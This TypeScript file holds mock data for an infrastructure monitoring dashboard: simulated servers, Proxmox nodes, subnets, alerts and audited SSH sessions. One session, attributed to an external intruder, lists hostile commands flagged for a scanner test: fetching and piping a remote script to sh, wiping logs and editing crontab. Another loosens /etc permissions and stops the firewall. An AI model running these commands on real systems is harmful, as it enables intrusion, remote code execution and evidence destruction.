/**
 * mockData.ts — Dados simulados da infraestrutura ATLAB
 *
 * Em produção, estes dados vêm da API REST do backend.
 * Contém: máquinas (10), nós Proxmox (3), sub-redes (6),
 * alertas, atividades, tarefas de automação, sessões SSH
 * com comandos (incluindo suspeitos para teste do scanner).
 */

import type {
  Machine, ProxmoxNode, Subnet, Alert, ActivityEvent, AutomationTask,
  Credential, AccessGroup, AuditSession, SoftwarePackage, CoreLoad, DiskInfo,
  ProcessInfo, ContainerInfo,
} from './types'

const now = Date.now()
const hist = (base: number) =>
  Array.from({ length: 30 }, () => Math.max(2, Math.min(100, base + (Math.random() - 0.5) * 30)))

const cores = (n: number, base: number, baseTemp: number): CoreLoad[] =>
  Array.from({ length: n }, (_, i) => ({
    core: i,
    load: Math.max(0, Math.min(100, base + (Math.random() - 0.5) * 40)),
    tempC: Math.round(baseTemp + (Math.random() - 0.3) * 12),
  }))

const disks = (specs: [string, string, number, number, number][]): DiskInfo[] =>
  specs.map(([device, mount, sizeGb, usedPct, tempC]) => ({
    device, mount, sizeGb, usedPct, tempC,
    health: usedPct > 92 ? 'WARN' : 'OK',
  }))

type MUser = Machine['users'][number]
const u = (username: string, sudo: boolean, fromIp: string, hoursAgo: number, sshKeyOnly = true, shell = '/bin/bash'): MUser => ({
  username, sudo, shell, lastLogin: now - hoursAgo * 3600_000, fromIp, sshKeyOnly,
})

export const initialMachines: Machine[] = [
  {
    id: 'm1', name: 'pve-node01', ip: '10.0.1.10', os: 'Proxmox VE', osVersion: '8.1.4', kernel: '6.5.13-1-pve',
    type: 'physical', node: 'pve-cluster-main', cores: 32, ramGb: 128, diskGb: 2048, status: 'healthy', group: 'Hypervisors',
    uptimeHours: 4320, cpu: 23, ram: 45, disk: 62, netIn: 120, netOut: 88, netDownMbps: 940, netUpMbps: 720, history: hist(23),
    tags: ['prod', 'critical'], coreLoads: cores(32, 23, 52), cpuTempC: 54,
    gpu: { model: 'NVIDIA A40', usage: 12, memUsedGb: 4.2, memTotalGb: 48, tempC: 48, powerW: 92, fanPct: 35, clockMhz: 1410, memClockMhz: 5001, encoderPct: 4, decoderPct: 2 },
    disks: disks([['nvme0n1', '/', 512, 62, 41], ['sda', '/mnt/storage', 2048, 55, 38]]),
    rootLoginEnabled: true, sshPasswordAuth: false, firewallEnabled: true, sshPort: 22,
    users: [u('root', true, '10.0.0.5', 1), u('admin', true, '10.0.0.5', 3), u('backup', false, '10.0.1.50', 8)],
    lastPatched: now - 1000 * 60 * 60 * 24 * 12, cves: [],
    loadAvg: [0.92, 0.77, 0.66] as [number, number, number],
    swapUsedMb: 0,
    swapTotalMb: 4096,
    iopsRead: 1200,
    iopsWrite: 800,
    diskLatencyMs: 1.2,
    tcpConnections: 45,
    netErrors: 0,
    processesTotal: 210,
    processesZombie: 0,
    sshActiveSessions: 2,
    failedLoginAttempts: 3,
    topProcesses: [
      { pid: 1001, name: 'qemu-system-x86', user: 'root', cpu: 8.2, ram: 12.5, state: 'S' as const },
      { pid: 1042, name: 'pvedaemon', user: 'root', cpu: 2.1, ram: 1.8, state: 'S' as const },
      { pid: 2100, name: 'zfs-arc', user: 'root', cpu: 1.5, ram: 18.0, state: 'S' as const },
      { pid: 3010, name: 'ollama', user: 'root', cpu: 4.0, ram: 8.2, state: 'S' as const },
      { pid: 4001, name: 'sshd', user: 'root', cpu: 0.1, ram: 0.3, state: 'S' as const },
    ],
    containers: [],
  },
  {
    id: 'm2', name: 'pve-node02', ip: '10.0.1.11', os: 'Proxmox VE', osVersion: '8.1.4', kernel: '6.5.13-1-pve',
    type: 'physical', node: 'pve-cluster-sec', cores: 32, ramGb: 128, diskGb: 2048, status: 'healthy', group: 'Hypervisors',
    uptimeHours: 4100, cpu: 67, ram: 72, disk: 38, netIn: 340, netOut: 210, netDownMbps: 880, netUpMbps: 650, history: hist(67),
    tags: ['prod'], coreLoads: cores(32, 67, 64), cpuTempC: 68,
    gpu: { model: 'NVIDIA A40', usage: 58, memUsedGb: 22, memTotalGb: 48, tempC: 71, powerW: 210, fanPct: 62, clockMhz: 1780, memClockMhz: 6800, encoderPct: 18, decoderPct: 12 },
    disks: disks([['nvme0n1', '/', 512, 38, 44], ['sdb', '/mnt/vmdata', 2048, 41, 40]]),
    rootLoginEnabled: false, sshPasswordAuth: false, firewallEnabled: true, sshPort: 22,
    users: [u('admin', true, '10.0.0.5', 2), u('deploy', false, '10.0.0.7', 5)],
    lastPatched: now - 1000 * 60 * 60 * 24 * 8, cves: [],
    loadAvg: [2.14, 2.23, 1.98] as [number, number, number],
    swapUsedMb: 128,
    swapTotalMb: 4096,
    iopsRead: 3400,
    iopsWrite: 2100,
    diskLatencyMs: 2.8,
    tcpConnections: 120,
    netErrors: 0,
    processesTotal: 245,
    processesZombie: 0,
    sshActiveSessions: 1,
    failedLoginAttempts: 1,
    topProcesses: [
      { pid: 1101, name: 'qemu-system-x86', user: 'root', cpu: 32.5, ram: 28.0, state: 'R' as const },
      { pid: 1102, name: 'qemu-system-x86', user: 'root', cpu: 18.3, ram: 22.0, state: 'S' as const },
      { pid: 2200, name: 'ollama', user: 'root', cpu: 12.0, ram: 14.5, state: 'R' as const },
      { pid: 3100, name: 'pvestatd', user: 'root', cpu: 1.2, ram: 0.8, state: 'S' as const },
      { pid: 4200, name: 'zfs-arc', user: 'root', cpu: 0.8, ram: 12.0, state: 'S' as const },
    ],
    containers: [],
  },
  {
    id: 'm3', name: 'pve-node03', ip: '10.0.1.12', os: 'Proxmox VE', osVersion: '8.0.3', kernel: '6.2.16-3-pve',
    type: 'physical', node: 'pve-dev', cores: 16, ramGb: 64, diskGb: 1024, status: 'warning', group: 'Hypervisors',
    uptimeHours: 980, cpu: 89, ram: 85, disk: 91, netIn: 90, netOut: 45, netDownMbps: 460, netUpMbps: 320, history: hist(89),
    tags: ['dev'], coreLoads: cores(16, 89, 82), cpuTempC: 86,
    gpu: null,
    disks: disks([['nvme0n1', '/', 1024, 91, 58]]),
    rootLoginEnabled: true, sshPasswordAuth: true, firewallEnabled: false, sshPort: 22,
    users: [u('root', true, '10.0.0.5', 1), u('dev', true, '189.40.22.10', 2, false), u('intern', true, '10.0.3.99', 6, false)],
    lastPatched: now - 1000 * 60 * 60 * 24 * 210, cves: ['CVE-2024-1086', 'CVE-2023-4911'],
    loadAvg: [3.56, 3.21, 2.89] as [number, number, number],
    swapUsedMb: 256,
    swapTotalMb: 4096,
    iopsRead: 4800,
    iopsWrite: 3200,
    diskLatencyMs: 8.5,
    tcpConnections: 89,
    netErrors: 2,
    processesTotal: 198,
    processesZombie: 2,
    sshActiveSessions: 3,
    failedLoginAttempts: 12,
    topProcesses: [
      { pid: 1201, name: 'qemu-system-x86', user: 'root', cpu: 45.2, ram: 32.0, state: 'R' as const },
      { pid: 1202, name: 'qemu-system-x86', user: 'root', cpu: 28.1, ram: 24.0, state: 'R' as const },
      { pid: 2300, name: 'pveproxy', user: 'www-data', cpu: 5.4, ram: 2.1, state: 'S' as const },
      { pid: 3200, name: 'kswapd0', user: 'root', cpu: 4.8, ram: 0.0, state: 'D' as const },
      { pid: 4300, name: 'rsyslogd', user: 'root', cpu: 1.2, ram: 0.5, state: 'S' as const },
    ],
    containers: [],
  },
  {
    id: 'm4', name: 'srv-db01', ip: '10.0.2.10', os: 'Ubuntu', osVersion: '22.04 LTS', kernel: '5.15.0-91-generic',
    type: 'vm', node: 'pve-cluster-main', cores: 8, ramGb: 32, diskGb: 500, status: 'healthy', group: 'Database',
    uptimeHours: 2200, cpu: 12, ram: 34, disk: 55, netIn: 56, netOut: 78, netDownMbps: 610, netUpMbps: 540, history: hist(12),
    tags: ['prod', 'db'], coreLoads: cores(8, 12, 44), cpuTempC: 46, gpu: null,
    disks: disks([['vda', '/', 100, 40, 0], ['vdb', '/var/lib/postgresql', 400, 60, 0]]),
    rootLoginEnabled: false, sshPasswordAuth: false, firewallEnabled: true, sshPort: 2222,
    users: [u('dbadmin', true, '10.0.0.7', 5), u('postgres', false, '10.0.2.10', 1)],
    lastPatched: now - 1000 * 60 * 60 * 24 * 5, cves: [],
    loadAvg: [0.48, 0.52, 0.45] as [number, number, number],
    swapUsedMb: 0,
    swapTotalMb: 4096,
    iopsRead: 2800,
    iopsWrite: 1900,
    diskLatencyMs: 1.1,
    tcpConnections: 230,
    netErrors: 0,
    processesTotal: 142,
    processesZombie: 0,
    sshActiveSessions: 1,
    failedLoginAttempts: 0,
    topProcesses: [
      { pid: 1301, name: 'postgres', user: 'postgres', cpu: 5.8, ram: 18.2, state: 'S' as const },
      { pid: 1302, name: 'postgres', user: 'postgres', cpu: 3.2, ram: 8.4, state: 'S' as const },
      { pid: 2400, name: 'pgbouncer', user: 'postgres', cpu: 1.1, ram: 0.5, state: 'S' as const },
      { pid: 3300, name: 'node_exporter', user: 'root', cpu: 0.5, ram: 0.2, state: 'S' as const },
      { pid: 4400, name: 'sshd', user: 'root', cpu: 0.1, ram: 0.1, state: 'S' as const },
    ],
    containers: [{ id: 'c1', name: 'postgres', image: 'postgres:16', status: 'running', cpuPct: 8.2, ramMb: 2048, restarts: 0, uptimeHours: 2200 }],
  },
  {
    id: 'm5', name: 'srv-web01', ip: '10.0.2.20', os: 'Debian', osVersion: '12', kernel: '6.1.0-17-amd64',
    type: 'vm', node: 'pve-cluster-main', cores: 4, ramGb: 16, diskGb: 256, status: 'critical', group: 'Web',
    uptimeHours: 12, cpu: 98, ram: 95, disk: 88, netIn: 890, netOut: 1200, netDownMbps: 980, netUpMbps: 950, history: hist(95),
    tags: ['prod', 'web'], coreLoads: cores(4, 98, 88), cpuTempC: 91, gpu: null,
    disks: disks([['vda', '/', 256, 88, 0]]),
    rootLoginEnabled: true, sshPasswordAuth: true, firewallEnabled: true, sshPort: 22,
    users: [u('root', true, '45.227.255.10', 0.2, false, '/bin/bash'), u('www-data', false, '10.0.2.20', 1), u('deploy', true, '10.0.0.7', 4)],
    lastPatched: now - 1000 * 60 * 60 * 24 * 95, cves: ['CVE-2024-6387'],
    loadAvg: [3.92, 3.88, 3.76] as [number, number, number],
    swapUsedMb: 256,
    swapTotalMb: 4096,
    iopsRead: 890,
    iopsWrite: 670,
    diskLatencyMs: 12.4,
    tcpConnections: 487,
    netErrors: 5,
    processesTotal: 289,
    processesZombie: 1,
    sshActiveSessions: 4,
    failedLoginAttempts: 47,
    topProcesses: [
      { pid: 1401, name: 'nginx', user: 'www-data', cpu: 42.3, ram: 8.5, state: 'R' as const },
      { pid: 1402, name: 'node', user: 'root', cpu: 38.7, ram: 32.0, state: 'R' as const },
      { pid: 2500, name: 'python3', user: 'root', cpu: 12.1, ram: 18.4, state: 'R' as const },
      { pid: 3400, name: 'sshd', user: 'root', cpu: 2.8, ram: 1.2, state: 'S' as const },
      { pid: 4500, name: 'cron', user: 'root', cpu: 1.5, ram: 0.3, state: 'S' as const },
    ],
    containers: [
      { id: 'c2', name: 'nginx', image: 'nginx:alpine', status: 'running', cpuPct: 45, ramMb: 512, restarts: 3, uptimeHours: 12 },
      { id: 'c3', name: 'app', image: 'atlab/api:latest', status: 'restarting', cpuPct: 52, ramMb: 1024, restarts: 18, uptimeHours: 0 },
    ],
  },
  {
    id: 'm6', name: 'srv-dev01', ip: '10.0.3.10', os: 'Ubuntu', osVersion: '24.04 LTS', kernel: '6.8.0-31-generic',
    type: 'vm', node: 'pve-dev', cores: 16, ramGb: 64, diskGb: 1024, status: 'healthy', group: 'Development',
    uptimeHours: 720, cpu: 5, ram: 22, disk: 30, netIn: 12, netOut: 8, netDownMbps: 720, netUpMbps: 680, history: hist(5),
    tags: ['dev'], coreLoads: cores(16, 5, 38), cpuTempC: 40,
    gpu: { model: 'NVIDIA RTX 4070', usage: 3, memUsedGb: 1.1, memTotalGb: 12, tempC: 35, powerW: 28, fanPct: 30, clockMhz: 1200, memClockMhz: 5001, encoderPct: 0, decoderPct: 0 },
    disks: disks([['vda', '/', 1024, 30, 0]]),
    rootLoginEnabled: false, sshPasswordAuth: false, firewallEnabled: true, sshPort: 22,
    users: [u('dev', false, '10.0.3.5', 1), u('joao.silva', false, '10.0.3.6', 3)],
    lastPatched: now - 1000 * 60 * 60 * 24 * 3, cves: [],
    loadAvg: [0.2, 0.15, 0.12] as [number, number, number],
    swapUsedMb: 0,
    swapTotalMb: 4096,
    iopsRead: 120,
    iopsWrite: 80,
    diskLatencyMs: 0.8,
    tcpConnections: 12,
    netErrors: 0,
    processesTotal: 156,
    processesZombie: 0,
    sshActiveSessions: 2,
    failedLoginAttempts: 0,
    topProcesses: [
      { pid: 1501, name: 'code-server', user: 'dev', cpu: 2.1, ram: 4.5, state: 'S' as const },
      { pid: 1502, name: 'ollama', user: 'root', cpu: 1.2, ram: 6.0, state: 'S' as const },
      { pid: 2600, name: 'node', user: 'dev', cpu: 0.8, ram: 2.1, state: 'S' as const },
      { pid: 3500, name: 'dockerd', user: 'root', cpu: 0.5, ram: 1.8, state: 'S' as const },
      { pid: 4600, name: 'sshd', user: 'root', cpu: 0.1, ram: 0.1, state: 'S' as const },
    ],
    containers: [{ id: 'c4', name: 'dev-api', image: 'node:22', status: 'running', cpuPct: 2, ramMb: 256, restarts: 0, uptimeHours: 720 }],
  },
  {
    id: 'm7', name: 'ct-redis01', ip: '10.0.2.30', os: 'Alpine', osVersion: '3.19', kernel: '6.5.13-1-pve',
    type: 'ct', node: 'pve-cluster-sec', cores: 2, ramGb: 4, diskGb: 32, status: 'healthy', group: 'Cache',
    uptimeHours: 1500, cpu: 18, ram: 41, disk: 22, netIn: 230, netOut: 190, netDownMbps: 940, netUpMbps: 900, history: hist(18),
    tags: ['prod', 'cache'], coreLoads: cores(2, 18, 42), cpuTempC: 44, gpu: null,
    disks: disks([['loop0', '/', 32, 22, 0]]),
    rootLoginEnabled: false, sshPasswordAuth: false, firewallEnabled: true, sshPort: 22,
    users: [u('redis', false, '10.0.2.10', 2)],
    lastPatched: now - 1000 * 60 * 60 * 24 * 6, cves: [],
    loadAvg: [0.72, 0.68, 0.65] as [number, number, number],
    swapUsedMb: 0,
    swapTotalMb: 4096,
    iopsRead: 5200,
    iopsWrite: 4800,
    diskLatencyMs: 0.3,
    tcpConnections: 340,
    netErrors: 0,
    processesTotal: 45,
    processesZombie: 0,
    sshActiveSessions: 0,
    failedLoginAttempts: 0,
    topProcesses: [
      { pid: 1601, name: 'redis-server', user: 'redis', cpu: 14.2, ram: 38.0, state: 'S' as const },
      { pid: 2700, name: 'redis-sentinel', user: 'redis', cpu: 1.8, ram: 1.2, state: 'S' as const },
      { pid: 3600, name: 'node_exporter', user: 'root', cpu: 0.3, ram: 0.2, state: 'S' as const },
      { pid: 4700, name: 'crond', user: 'root', cpu: 0.1, ram: 0.1, state: 'S' as const },
      { pid: 5100, name: 'rngd', user: 'root', cpu: 0.0, ram: 0.1, state: 'S' as const },
    ],
    containers: [],
  },
  {
    id: 'm8', name: 'ct-nginx01', ip: '10.0.2.31', os: 'Alpine', osVersion: '3.19', kernel: '6.5.13-1-pve',
    type: 'ct', node: 'pve-cluster-sec', cores: 2, ramGb: 4, diskGb: 32, status: 'healthy', group: 'Web',
    uptimeHours: 1500, cpu: 31, ram: 28, disk: 19, netIn: 670, netOut: 540, netDownMbps: 940, netUpMbps: 880, history: hist(31),
    tags: ['prod', 'web', 'proxy'], coreLoads: cores(2, 31, 46), cpuTempC: 47, gpu: null,
    disks: disks([['loop0', '/', 32, 19, 0]]),
    rootLoginEnabled: false, sshPasswordAuth: false, firewallEnabled: true, sshPort: 22,
    users: [u('nginx', false, '10.0.2.10', 1)],
    lastPatched: now - 1000 * 60 * 60 * 24 * 6, cves: [],
    loadAvg: [1.24, 1.1, 0.98] as [number, number, number],
    swapUsedMb: 0,
    swapTotalMb: 4096,
    iopsRead: 450,
    iopsWrite: 320,
    diskLatencyMs: 0.5,
    tcpConnections: 890,
    netErrors: 0,
    processesTotal: 38,
    processesZombie: 0,
    sshActiveSessions: 0,
    failedLoginAttempts: 0,
    topProcesses: [
      { pid: 1701, name: 'nginx', user: 'root', cpu: 18.5, ram: 12.0, state: 'S' as const },
      { pid: 1702, name: 'nginx', user: 'nginx', cpu: 8.2, ram: 6.4, state: 'S' as const },
      { pid: 2800, name: 'nginx', user: 'nginx', cpu: 3.1, ram: 4.8, state: 'S' as const },
      { pid: 3700, name: 'node_exporter', user: 'root', cpu: 0.2, ram: 0.2, state: 'S' as const },
      { pid: 4800, name: 'crond', user: 'root', cpu: 0.0, ram: 0.1, state: 'S' as const },
    ],
    containers: [],
  },
  {
    id: 'm9', name: 'srv-legacy01', ip: '10.0.4.5', os: 'CentOS', osVersion: '7', kernel: '3.10.0-1160',
    type: 'vm', node: 'pve-dev', cores: 4, ramGb: 8, diskGb: 100, status: 'offline', group: 'Legacy',
    uptimeHours: 0, cpu: 0, ram: 0, disk: 67, netIn: 0, netOut: 0, netDownMbps: 0, netUpMbps: 0, history: Array(30).fill(0),
    tags: ['legacy', 'eol'], coreLoads: cores(4, 0, 0), cpuTempC: 0, gpu: null,
    disks: disks([['sda', '/', 100, 67, 0]]),
    rootLoginEnabled: true, sshPasswordAuth: true, firewallEnabled: false, sshPort: 22,
    users: [u('root', true, '10.0.4.1', 720, false)],
    lastPatched: now - 1000 * 60 * 60 * 24 * 900, cves: ['CVE-2021-4034', 'CVE-2024-1086', 'CVE-2022-0847'],
    loadAvg: [0, 0, 0] as [number, number, number],
    swapUsedMb: 0,
    swapTotalMb: 4096,
    iopsRead: 0,
    iopsWrite: 0,
    diskLatencyMs: 0,
    tcpConnections: 0,
    netErrors: 0,
    processesTotal: 0,
    processesZombie: 0,
    sshActiveSessions: 0,
    failedLoginAttempts: 0,
    topProcesses: [],
    containers: [],
  },
  {
    id: 'm10', name: 'srv-monitor01', ip: '10.0.10.5', os: 'Debian', osVersion: '12', kernel: '6.1.0-17-amd64',
    type: 'vm', node: 'pve-cluster-main', cores: 4, ramGb: 16, diskGb: 512, status: 'healthy', group: 'Management',
    uptimeHours: 3300, cpu: 44, ram: 58, disk: 71, netIn: 410, netOut: 380, netDownMbps: 860, netUpMbps: 800, history: hist(44),
    tags: ['prod', 'monitoring'], coreLoads: cores(4, 44, 56), cpuTempC: 58, gpu: null,
    disks: disks([['vda', '/', 512, 71, 0]]),
    rootLoginEnabled: false, sshPasswordAuth: false, firewallEnabled: true, sshPort: 22,
    users: [u('admin', true, '10.0.0.5', 1), u('grafana', false, '10.0.10.5', 2)],
    lastPatched: now - 1000 * 60 * 60 * 24 * 4, cves: [],
    loadAvg: [1.76, 1.68, 1.55] as [number, number, number],
    swapUsedMb: 64,
    swapTotalMb: 4096,
    iopsRead: 1800,
    iopsWrite: 1200,
    diskLatencyMs: 1.8,
    tcpConnections: 156,
    netErrors: 0,
    processesTotal: 178,
    processesZombie: 0,
    sshActiveSessions: 1,
    failedLoginAttempts: 2,
    topProcesses: [
      { pid: 1801, name: 'prometheus', user: 'root', cpu: 12.4, ram: 22.0, state: 'S' as const },
      { pid: 1802, name: 'grafana-server', user: 'grafana', cpu: 5.2, ram: 8.5, state: 'S' as const },
      { pid: 2900, name: 'alertmanager', user: 'root', cpu: 2.1, ram: 3.2, state: 'S' as const },
      { pid: 3800, name: 'node_exporter', user: 'root', cpu: 0.8, ram: 0.3, state: 'S' as const },
      { pid: 4900, name: 'sshd', user: 'root', cpu: 0.1, ram: 0.1, state: 'S' as const },
    ],
    containers: [
      { id: 'c5', name: 'prometheus', image: 'prom/prometheus:latest', status: 'running', cpuPct: 12, ramMb: 2048, restarts: 0, uptimeHours: 3300 },
      { id: 'c6', name: 'grafana', image: 'grafana/grafana:latest', status: 'running', cpuPct: 5, ramMb: 512, restarts: 0, uptimeHours: 3300 },
    ],
  },
]

const sc = (ts: number, cmd: string, exitCode = 0, suspicious = false) => ({ ts, cmd, exitCode, suspicious })

export const initialSessions: AuditSession[] = [
  {
    id: 'sess1', machineId: 'm5', user: 'root', fromIp: '45.227.255.10', external: true,
    start: now - 1000 * 60 * 14, end: null,
    commands: [
      sc(now - 1000 * 60 * 13, 'whoami'),
      sc(now - 1000 * 60 * 13, 'cat /etc/passwd'),
      sc(now - 1000 * 60 * 12, 'wget http://45.227.255.10/x.sh -O /tmp/.x', 0, true),
      sc(now - 1000 * 60 * 12, 'chmod +x /tmp/.x', 0, true),
      sc(now - 1000 * 60 * 11, 'curl -s http://malware.cc/m | sh', 0, true),
      sc(now - 1000 * 60 * 10, 'crontab -e', 0, true),
      sc(now - 1000 * 60 * 9, 'rm -rf /var/log/*', 0, true),
    ],
  },
  {
    id: 'sess2', machineId: 'm3', user: 'intern', fromIp: '10.0.3.99', external: false,
    start: now - 1000 * 60 * 60 * 2, end: now - 1000 * 60 * 60 * 1.5,
    commands: [
      sc(now - 1000 * 60 * 118, 'sudo su -', 0, true),
      sc(now - 1000 * 60 * 117, 'chmod 777 -R /etc', 0, true),
      sc(now - 1000 * 60 * 116, 'systemctl stop firewalld', 1, true),
      sc(now - 1000 * 60 * 115, 'apt install nginx', 0),
      sc(now - 1000 * 60 * 113, 'nano /etc/nginx/nginx.conf'),
    ],
  },
  {
    id: 'sess3', machineId: 'm4', user: 'dbadmin', fromIp: '10.0.0.7', external: false,
    start: now - 1000 * 60 * 60 * 5, end: now - 1000 * 60 * 60 * 4.8,
    commands: [
      sc(now - 1000 * 60 * 300, 'psql -U postgres'),
      sc(now - 1000 * 60 * 299, 'pg_dump atlab_prod > /backup/dump.sql'),
      sc(now - 1000 * 60 * 298, 'systemctl restart postgresql'),
    ],
  },
  {
    id: 'sess4', machineId: 'm1', user: 'admin', fromIp: '10.0.0.5', external: false,
    start: now - 1000 * 60 * 60 * 3, end: now - 1000 * 60 * 60 * 2.9,
    commands: [
      sc(now - 1000 * 60 * 180, 'qm list'),
      sc(now - 1000 * 60 * 179, 'pvesh get /nodes'),
      sc(now - 1000 * 60 * 178, 'zfs list'),
    ],
  },
  {
    id: 'sess5', machineId: 'm6', user: 'joao.silva', fromIp: '10.0.3.6', external: false,
    start: now - 1000 * 60 * 30, end: null,
    commands: [
      sc(now - 1000 * 60 * 28, 'git clone git@github.com:atlab/api.git'),
      sc(now - 1000 * 60 * 27, 'docker compose up -d'),
      sc(now - 1000 * 60 * 25, 'docker logs -f api'),
    ],
  },
]

export const softwareCatalog: SoftwarePackage[] = [
  { id: 'docker', name: 'Docker + Compose', description: 'Engine de containers', category: 'Containers' },
  { id: 'k3s', name: 'K3s', description: 'Kubernetes leve', category: 'Containers' },
  { id: 'postgres', name: 'PostgreSQL 16', description: 'Banco relacional', category: 'Banco de Dados' },
  { id: 'mysql', name: 'MySQL 8', description: 'Banco relacional', category: 'Banco de Dados' },
  { id: 'redis', name: 'Redis', description: 'Cache em memória', category: 'Banco de Dados' },
  { id: 'mongodb', name: 'MongoDB', description: 'Banco NoSQL', category: 'Banco de Dados' },
  { id: 'nginx', name: 'Nginx', description: 'Web server / proxy', category: 'Web' },
  { id: 'caddy', name: 'Caddy', description: 'Web server com HTTPS auto', category: 'Web' },
  { id: 'nodejs', name: 'Node.js 22 LTS', description: 'Runtime JavaScript', category: 'Runtime' },
  { id: 'python', name: 'Python 3.12', description: 'Runtime Python + pip', category: 'Runtime' },
  { id: 'golang', name: 'Go 1.22', description: 'Toolchain Go', category: 'Runtime' },
  { id: 'tmux', name: 'tmux', description: 'Multiplexador de terminal', category: 'Utilitários' },
  { id: 'htop', name: 'htop', description: 'Monitor de processos', category: 'Utilitários' },
  { id: 'git', name: 'Git', description: 'Controle de versão', category: 'Utilitários' },
  { id: 'fail2ban', name: 'fail2ban', description: 'Proteção contra brute-force', category: 'Segurança' },
  { id: 'ufw', name: 'UFW Firewall', description: 'Firewall simplificado', category: 'Segurança' },
]

export const initialNodes: ProxmoxNode[] = [
  { id: 'n1', name: 'pve-cluster-main', host: '10.0.1.10:8006', status: 'connected', version: '8.1.4', vms: 12, containers: 8, cpu: 45, ram: 62, disk: 55, cores: 32, ramTotalGb: 128, cpuModel: 'AMD EPYC 7543', uptimeDays: 180 },
  { id: 'n2', name: 'pve-cluster-sec', host: '10.0.1.11:8006', status: 'connected', version: '8.1.4', vms: 8, containers: 15, cpu: 38, ram: 71, disk: 42, cores: 32, ramTotalGb: 128, cpuModel: 'AMD EPYC 7543', uptimeDays: 171 },
  { id: 'n3', name: 'pve-dev', host: '10.0.1.20:8006', status: 'disconnected', version: '8.0.3', vms: 5, containers: 3, cpu: 0, ram: 0, disk: 78, cores: 16, ramTotalGb: 64, cpuModel: 'Intel Xeon E-2288G', uptimeDays: 0 },
]

export const initialSubnets: Subnet[] = [
  { id: 's1', network: '10.0.1.0', mask: '/24', description: 'Hypervisors', totalIps: 254, usedIps: 12, vlan: 'VLAN 10', gateway: '10.0.1.1' },
  { id: 's2', network: '10.0.2.0', mask: '/24', description: 'Produção', totalIps: 254, usedIps: 145, vlan: 'VLAN 20', gateway: '10.0.2.1' },
  { id: 's3', network: '10.0.3.0', mask: '/24', description: 'Desenvolvimento', totalIps: 254, usedIps: 23, vlan: 'VLAN 30', gateway: '10.0.3.1' },
  { id: 's4', network: '10.0.4.0', mask: '/24', description: 'Legacy', totalIps: 254, usedIps: 8, vlan: 'VLAN 40', gateway: '10.0.4.1' },
  { id: 's5', network: '10.0.10.0', mask: '/24', description: 'Management', totalIps: 254, usedIps: 6, vlan: 'VLAN 100', gateway: '10.0.10.1' },
  { id: 's6', network: '192.168.1.0', mask: '/24', description: 'DMZ', totalIps: 254, usedIps: 3, vlan: 'VLAN 200', gateway: '192.168.1.1' },
]

export const initialAlerts: Alert[] = [
  { id: 'a1', severity: 'critical', title: 'CPU crítica em srv-web01', message: 'Uso de CPU acima de 95% há 10 minutos', source: 'srv-web01', timestamp: now - 1000 * 60 * 5, acknowledged: false },
  { id: 'a2', severity: 'critical', title: 'Acesso externo suspeito', message: 'Login root de 45.227.255.10 (fora da rede) em srv-web01', source: 'srv-web01', timestamp: now - 1000 * 60 * 14, acknowledged: false },
  { id: 'a3', severity: 'warning', title: 'Temperatura elevada', message: 'pve-node03 com CPU a 86°C', source: 'pve-node03', timestamp: now - 1000 * 60 * 25, acknowledged: false },
  { id: 'a4', severity: 'warning', title: 'Nó Proxmox desconectado', message: 'pve-dev não responde há 3 horas', source: 'pve-dev', timestamp: now - 1000 * 60 * 180, acknowledged: true },
  { id: 'a5', severity: 'info', title: 'Backup concluído', message: 'Snapshot de srv-db01 finalizado com sucesso', source: 'automation', timestamp: now - 1000 * 60 * 240, acknowledged: true },
]

export const initialActivity: ActivityEvent[] = [
  { id: 'e1', action: 'Conexão SSH iniciada', target: 'srv-db01', user: 'admin', timestamp: now - 1000 * 60 * 2, type: 'ssh' },
  { id: 'e2', action: 'VM provisionada', target: 'srv-api02', user: 'admin', timestamp: now - 1000 * 60 * 45, type: 'provision' },
  { id: 'e3', action: 'IP alocado', target: '10.0.2.25', user: 'joao.silva', timestamp: now - 1000 * 60 * 90, type: 'network' },
  { id: 'e4', action: 'Credencial atualizada', target: 'Deploy User', user: 'admin', timestamp: now - 1000 * 60 * 120, type: 'config' },
  { id: 'e5', action: 'Login na plataforma', target: 'ATLAB', user: 'maria.souza', timestamp: now - 1000 * 60 * 200, type: 'auth' },
  { id: 'e6', action: 'Container removido', target: 'ct-test99', user: 'admin', timestamp: now - 1000 * 60 * 300, type: 'delete' },
]

export const initialTasks: AutomationTask[] = [
  { id: 't1', name: 'Backup diário - Produção', description: 'Snapshot de todas as VMs do grupo Produção', schedule: '0 2 * * *', lastRun: now - 1000 * 60 * 60 * 8, nextRun: now + 1000 * 60 * 60 * 16, enabled: true, status: 'success', type: 'backup' },
  { id: 't2', name: 'Health check', description: 'Verificação de saúde a cada 5 minutos', schedule: '*/5 * * * *', lastRun: now - 1000 * 60 * 3, nextRun: now + 1000 * 60 * 2, enabled: true, status: 'success', type: 'healthcheck' },
  { id: 't3', name: 'Limpeza de logs', description: 'Remove logs com mais de 30 dias', schedule: '0 4 * * 0', lastRun: now - 1000 * 60 * 60 * 24 * 2, nextRun: now + 1000 * 60 * 60 * 24 * 5, enabled: true, status: 'idle', type: 'cleanup' },
  { id: 't4', name: 'Snapshot pré-deploy', description: 'Snapshot antes de cada deploy em Web', schedule: 'on-demand', lastRun: now - 1000 * 60 * 60 * 30, nextRun: 0, enabled: false, status: 'idle', type: 'snapshot' },
  { id: 't5', name: 'Scan de vulnerabilidades', description: 'Varredura de segurança em todas as máquinas', schedule: '0 */6 * * *', lastRun: now - 1000 * 60 * 60 * 2, nextRun: now + 1000 * 60 * 60 * 4, enabled: true, status: 'success', type: 'healthcheck' },
]

export const initialCredentials: Credential[] = [
  { id: 'c1', label: 'Root - Hypervisors', type: 'ssh-key', username: 'root', target: 'pve-node*', createdAt: '2026-05-10', lastUsed: now - 1000 * 60 * 30 },
  { id: 'c2', label: 'Deploy User', type: 'ssh-key', username: 'deploy', target: 'srv-web*', createdAt: '2026-04-22', lastUsed: now - 1000 * 60 * 120 },
  { id: 'c3', label: 'Database Admin', type: 'password', username: 'dbadmin', target: 'srv-db*', createdAt: '2026-03-15', lastUsed: now - 1000 * 60 * 60 * 5 },
  { id: 'c4', label: 'Proxmox API', type: 'token', username: 'api@pam', target: 'pve-cluster-main', createdAt: '2026-06-01', lastUsed: now - 1000 * 60 * 8 },
  { id: 'c5', label: 'Dev SSH Key', type: 'ssh-key', username: 'dev', target: 'srv-dev*', createdAt: '2026-06-20', lastUsed: now - 1000 * 60 * 60 * 24 },
]

export const initialGroups: AccessGroup[] = [
  { id: 'g1', name: 'Administradores', description: 'Acesso total a todas as máquinas', members: 3, machines: ['Todas'], permissions: ['ssh', 'sudo', 'provisionar', 'gerenciar'], color: 'red' },
